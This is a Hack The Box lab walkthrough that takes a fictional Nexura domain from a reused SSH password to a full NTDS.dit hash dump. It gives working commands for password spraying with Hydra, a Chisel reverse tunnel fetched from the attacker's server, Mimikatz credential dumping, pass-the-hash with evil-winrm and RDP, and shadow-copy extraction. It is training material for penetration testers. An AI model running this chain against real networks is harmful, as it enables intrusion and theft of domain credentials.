> For the complete documentation index, see [llms.txt](https://ganesha-hk.gitbook.io/offensive-security-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/password-attacks.md).

# Password Attacks

## Skill Assessment Walkthrough

> **HTB Module:** Password Attacks **Difficulty:** Hard **Goal:** Gain NTLM hash of the Domain Controller (DC01) or Administrator

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FMLzdXao0PpnF3gOz5QHA%2Fimage.png?alt=media&amp;token=d295f74d-6595-4fd9-9a06-a5995a6f2bcf" alt=""><figcaption></figcaption></figure>

***

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FAEbDGrdm5T9DEG2FqL8o%2Fksnip_20260910-022034.png?alt=media&amp;token=7b8c320c-2f66-42bf-9017-d28a417ce2b9" alt=""><figcaption></figcaption></figure>

### 📌 Scenario

Betty Jayde works at **Nexura LLC**. She reuses the password `Texas123!@#` across multiple sites — we suspect she uses it at work too. Our job: get into Nexura's network and pop the domain controller.

### 🎯 Targets

```
DMZ01   →  10.129.x.x (external)  /  172.16.119.13 (internal)
JUMP01  →  172.16.119.7
FILE01  →  172.16.119.10
DC01    →  172.16.119.11
```

### 🗺️ Attack Chain

```
DMZ01 (SSH) → bash_history creds → Chisel pivot
  → JUMP01 (RDP) → .psafe3 file → crack it
    → FILE01 (RDP) → Mimikatz → NTLM hash
      → DC01 (PTH) → NTDS.dit dump → GG 🏴
```

***

***

## Step 1 — Nmap Scan

First things first — scan the box.

```bash
nmap -sC -sV -p- --min-rate 5000 10.129.155.203
```

SSH (port 22) is the only thing open. That's our way in.

> 📸 **Image 1** — Nmap scan showing port 22/tcp (SSH) open on DMZ01
>
> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FTjkSAhbvPseoeFDeAESh%2Fimg-000.png?alt=media\&token=a1a0b94a-7535-4a76-8ad1-761df05b004c)

***

## Step 2 — Generating Usernames

We know the target is **Betty Jayde**. Generate possible usernames with `username-anarchy`:

```bash
username-anarchy Betty Jayde > users.txt
```

This gives us combos like `jbetty`, `betty.jayde`, `bjayde`, `b.jayde`, etc.

> 📸 **Image 2** — username-anarchy output generating all possible username formats

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FrgfBsYNKunDSJAdBBDll%2Fimg-001.png?alt=media&amp;token=9ada27f9-76a0-4371-a505-cf6eee50a880" alt=""><figcaption></figcaption></figure>

***

## Step 3 — Brute-Forcing SSH with Hydra

We have the username list and the known password `Texas123!@#`. Spray it against SSH:

```bash
hydra -L user.txt -p 'Texas123!@#' ssh://10.129.155.203
```

**Hit!** 🎯

```
[22][ssh] host: 10.129.155.203   login: jbetty   password: Texas123!@#
```

> 📸 **Image 3** — Hydra finding valid SSH credentials `jbetty:Texas123!@#`

***

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FEjJhTPyn3h4PHwP0vm2v%2Fimg-002.png?alt=media&amp;token=af82ba83-37a5-4b73-b5fc-4b8e9fe68104" alt=""><figcaption></figcaption></figure>

## Step 4 — SSH In

```bash
ssh jbetty@10.129.155.203
# password: Texas123!@#
```

We're in. Let's snoop around.

***

## Step 5 — Creds in Bash History

Always. Check. The. History.

```bash
cat ~/.bash_history
```

Jackpot 💰 — bash history shows an `sshpass` command with creds for another user:

```
sshpass -p "dealer-screwed-gym1" ssh hwilliam@file01
```

New creds:

```
hwilliam : dealer-screwed-gym1
```

> 📸 **Image 4** — bash\_history revealing hwilliam's credentials via sshpass command

***

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FP0Mpe7qYHAF3qNkViZpu%2Fimg-003.png?alt=media&amp;token=b35b6c7f-08e3-4973-b86c-e979e4338cc4" alt=""><figcaption></figcaption></figure>

## Step 6 — Pivoting with Chisel

We're on DMZ01 but the juicy targets are on `172.16.119.0/24`. Time to tunnel in.

#### Add internal hosts to `/etc/hosts` (attacker machine)

```bash
sudo bash -c 'echo -e "172.16.119.7  JUMP01\n172.16.119.10 FILE01\n172.16.119.11 DC01" >> /etc/hosts'
```

#### Upload chisel to target

**Attacker:**

```bash
python3 -m http.server 9090
```

**Target (DMZ01):**

```bash
wget http://<vpn-ip>:9090/chisel
chmod +x chisel
```

#### Start the tunnel

Make sure `/etc/proxychains4.conf` has:

```
socks5 127.0.0.1 1081
```

**Attacker — start chisel server:**

```bash
sudo chisel server --reverse -p 9090
```

**Target — connect back:**

```bash
./chisel client <vpn-ip>:9090 R:1081:socks
```

Now all `proxychains` traffic routes through DMZ01 into the internal network. 🔥

***

## Step 7 — Internal Port Scan

See what's open on FILE01 through the tunnel:

```bash
proxychains nmap -p3389,5985,445,139 172.16.119.10
```

Ports 139, 445, 3389, 5985 all show as **filtered** — we can work with RDP and WinRM.

> 📸 **Image 5** — Proxychains nmap scan on FILE01 (172.16.119.10) showing filtered ports

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FtSCAeIm0mNfb3ETbJ7MK%2Fimg-004.png?alt=media&amp;token=6bc112b0-dab3-4baf-9433-ccb8918edd65" alt=""><figcaption></figcaption></figure>

***

## Step 8 — RDP into JUMP01

Evil-winrm didn't connect, so we go with RDP using `hwilliam` creds. We also mount a shared drive for easy file transfer:

```bash
proxychains xfreerdp /v:172.16.119.7 /u:hwilliam /p:'dealer-screwed-gym1' /drive:linux,/home/hacker/htb/sh
```

We land on JUMP01's desktop. Notice **Password Safe 3** is installed — interesting. 👀

> 📸 **Image 6** — RDP session on JUMP01 (172.16.119.7) showing desktop with Password Safe 3 installed

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FhGYe8nVqqkWLzDP14GT8%2Fimg-005.png?alt=media&amp;token=978fee59-0d6d-4d97-82d4-497d99e67507" alt=""><figcaption></figcaption></figure>

***

## Step 9 — Cracking the Password Safe (.psafe3)

We find `Employee-Passwords_OLD.psafe3` on JUMP01. Copy it to the shared drive, then crack it on our machine.

Extract the hash and crack with john:

```bash
pwsafe2john Employee-Passwords_OLD.psafe3
pwsafe2john Employee-Passwords_OLD.psafe3 > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Cracked! Master password:

```
michaeljackson
```

> 📸 **Image 7** — pwsafe2john extracting hash and john cracking it → password is `michaeljackson`

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FgBn28sWTPfN6FM0wCiBz%2Fimg-006.png?alt=media&amp;token=82bcf3f8-f75e-4349-9a2d-37b421ebb221" alt=""><figcaption></figcaption></figure>

***

## Step 10 — Opening the Password Safe

Open the `.psafe3` file with Password Safe using the cracked master password `michaeljackson`.

Inside we find **Domain Users** with stored credentials:

```
David Brittni  [bdavid]
Tom Sandy      [stom]
William Hallam [hwilliam]
```

Right-click each entry → copy password to get the creds.

> 📸 **Image 8** — Password Safe GUI showing stored domain users (bdavid, stom, hwilliam)

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FN5Nu4j4G8fUdJDsYyjDn%2Fimg-007.png?alt=media&amp;token=fe905e53-8e7c-472c-8689-b41d0bfdc0d5" alt=""><figcaption></figcaption></figure>

***

## Step 11 — RDP into FILE01 as bdavid

```bash
proxychains xfreerdp /v:172.16.119.10 /u:bdavid /p:'caramel-cigars-reply1' /drive:linux,/home/hacker/htb/sh
```

Check our privileges:

```cmd
whoami /groups
```

**bdavid is in BUILTIN\Administrators** (deny only) and **NEXURA\IT** group.

> 📸 **Image 9** — `whoami /groups` on FILE01 showing bdavid's group memberships including Administrators

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F91MK3kxrxIg7lp7ZdyNu%2Fimg-008.png?alt=media&amp;token=9b4bbe5c-30a6-4661-bf29-d39bbe1b7651" alt=""><figcaption></figcaption></figure>

***

## Step 12 — Mimikatz on JUMP01

We upload `mimikatz.exe` via the shared drive (`linux on kali`) and run it as administrator on JUMP01.

```
mimikatz # privilege::debug
Privilege '20' OK
```

> 📸 **Image 10** — Mimikatz uploaded via shared drive and running with debug privilege on JUMP01

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2Fw0fuqvJUFfJO5kxqXomp%2Fimg-009.png?alt=media&amp;token=aca158a7-0059-4fde-a277-51bf22078b19" alt=""><figcaption></figcaption></figure>

***

## Step 13 — Dumping Creds with Mimikatz

```
mimikatz # sekurlsa::logonpasswords
```

We get **stom's** NTLM hash and cleartext Kerberos password:

```
Username : stom
Domain   : NEXURA
NTLM     : 21ea958524cfd9a7791737f8d2f764fa
Kerberos : calves-warp-learning1
```

> 📸 **Image 11** — Mimikatz sekurlsa::logonpasswords dumping stom's NTLM hash and Kerberos password

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F9sRIU6qEswqe4i4RpmAY%2Fimg-010.png?alt=media&amp;token=e27bc077-ada2-48ad-b40a-388c1adcb4f4" alt=""><figcaption></figcaption></figure>

***

## Step 14 — Pass-the-Hash to DC01

Use `evil-winrm` with stom's hash to connect to DC01:

```bash
proxychains evil-winrm -i 172.16.119.11 -u stom -H 21ea958524cfd9a7791737f8d2f764fa
```

We're on the Domain Controller! 🏴 `whoami` → `nexura\stom`, `hostname` → `DC01`

> 📸 **Image 12** — Evil-WinRM shell on DC01 (172.16.119.11) as nexura\stom

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FrtROvmpjxDWDni0qb285%2Fimg-011.png?alt=media&amp;token=a9602580-9301-4887-ac57-09cd395a4817" alt=""><figcaption></figcaption></figure>

***

## Step 15 — stom is a Domain Admin

```cmd
whoami /groups
```

Confirmed — **NEXURA\Domain Admins** is in the group list. We own the domain.

> 📸 **Image 13** — `whoami /groups` on DC01 confirming stom is a member of NEXURA\Domain Admins

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F1icpBOc2mLqPMmdkXOE9%2Fimg-012.png?alt=media&amp;token=c93727bc-0a8b-4a21-b084-4898093e37e2" alt=""><figcaption></figcaption></figure>

***

## Step 16 — GUI Access to DC01 (Pass-the-Hash RDP)

First, disable RestrictedAdmin on DC01 via the evil-winrm session:

```powershell
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

Now RDP in using the NTLM hash:

```bash
proxychains xfreerdp /v:172.16.119.11 /u:stom /pth:'21ea958524cfd9a7791737f8d2f764fa'
```

We have full GUI on DC01 as `nexura\stom`.

> 📸 **Image 14** — RDP session on DC01 (172.16.119.11) with admin cmd prompt showing nexura\stom

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FZhejJE8YLiqGxBIpUjvp%2Fimg-013.png?alt=media&amp;token=6f9766a2-4685-4861-b4d8-fa5391d005d3" alt=""><figcaption></figcaption></figure>

***

## Step 17 — Dumping the Domain (NTDS.dit)

On DC01, open **cmd as Administrator** and extract the goods:

```cmd
reg save hklm\system C:\system.hive

vssadmin CREATE SHADOW /For=C:

mkdir C:\NTDS

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
```

Transfer `system.hive` and `NTDS.dit` to the attacker machine via the shared drive.

> 📸 **Image 15** — Shared drive on DC01 showing extracted files (NTDS.dit, system.hive, sam.hive)

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FqsLQdt7Qs2Za3jMJM61l%2Fimg-014.png?alt=media&amp;token=9281778a-6394-414d-82fc-173ba609daf9" alt=""><figcaption></figcaption></figure>

#### Dump All Domain Hashes with secretsdump

Back on our machine:

```bash
secretsdump.py -ntds NTDS.dit -system system.hive LOCAL
```

This dumps **every single hash in the domain** — Administrator, Guest, DC01$, krbtgt, bdavid, stom, hwilliam, FILE01$, JUMP01$... everything.

> 📸 **Image 16** — secretsdump.py output showing all domain account NTLM hashes from NTDS.dit

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FfuLuSKmiX0oT44NTYtcC%2Fimg-015.png?alt=media&amp;token=8b37ff7b-7be6-4e98-bd28-7bbd24f16fc6" alt=""><figcaption></figcaption></figure>

***

## 🏆 Pwned!

Full domain compromise achieved. We went from a reused password on an external-facing SSH service all the way to dumping every credential in the Nexura domain.

#### Tools Used

| Tool               | Purpose                                |
| ------------------ | -------------------------------------- |
| `nmap`             | Port scanning                          |
| `username-anarchy` | Username generation                    |
| `hydra`            | SSH brute-force                        |
| `chisel`           | SOCKS proxy / pivoting                 |
| `proxychains`      | Route traffic through tunnel           |
| `xfreerdp`         | RDP access + shared drive              |
| `pwsafe2john`      | Extract hash from .psafe3              |
| `john`             | Cracking password safe master password |
| `pwsafe`           | Opening .psafe3 database               |
| `mimikatz`         | Credential dumping (NTLM hashes)       |
| `evil-winrm`       | WinRM shell with pass-the-hash         |
| `secretsdump.py`   | NTDS.dit + system.hive → domain hashes |

***

> **GG 🏴** — From password reuse to domain admin.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/password-attacks.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
